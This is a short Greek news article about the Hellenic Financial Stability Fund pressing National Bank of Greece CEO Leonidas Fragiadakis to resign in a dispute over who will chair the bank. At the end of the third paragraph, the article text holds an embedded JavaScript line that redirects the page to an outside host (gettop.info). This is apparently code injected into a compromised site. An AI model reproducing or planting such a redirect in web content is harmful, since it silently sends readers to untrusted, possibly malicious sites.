Θύελλα στην Εθνική -Ζητούνται τα «κεφάλια» πρέδρου και μάνατζερ

0
10

 

Ασφυκτικές πιέσεις ασκούνται στον διευθύνοντα σύμβουλο της Εθνικής Τράπεζας  Λεωνίδα Φραγκιαδάκη να υποβάλει παραίτηση, διότι έχει έρθει σε πλήρη ρήξη με το  Ταμείο Χρηματοπιστωτικής Σταθερότητας, υποστηρίζοντας την υποψηφιότητα του Παναγιώτη Θωμόπουλου για τη θέση του προέδρου της τράπεζας.

Όλα ξεκίνησαν με την αποχώρηση της Λούκας Κατσέλη και την απόφαση του ΤΧΣ -που είναι ο μεγαλύτερος μέτοχος της τράπεζας- να οριστεί ως διάδοχός της ο κ. Τσιτριράγκος, τον οποίο θεωρεί στέλεχος με διεθνή εμπειρία, φρέσκες ιδέες και χωρίς επαγγελματική εμπλοκή με τα ελληνικά πράγματα. Ωστόσο, το Δ.Σ εξέλεγε τον κ. Θωμόπουλου με συντριπτική πλειοψηφία (8-2), με τη συνδρομή του κ. Φραγκιαδάκη.

Από εκείνη τη στιγμή ξεκίνησε μαραθώνιος πιέσεων προς τον κ. Φραγκιαδάκη, χωρίς επιτυχία μέχρι στιγμής. Το ΤΧΣ ζητά την παραίτηση Φραγκιαδάκη ως «αναγκαίο όρο» για να εξομαλυνθεί η κατάσταση. Αλλιώς, θα προκαλέσει έκτακτη γενική συνέλευση, ώστε να εκλεγεί άλλο Δ.Σ, το οποίο θα μπορεί να αντικαταστήσει τον κ. Θωμόπουλο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here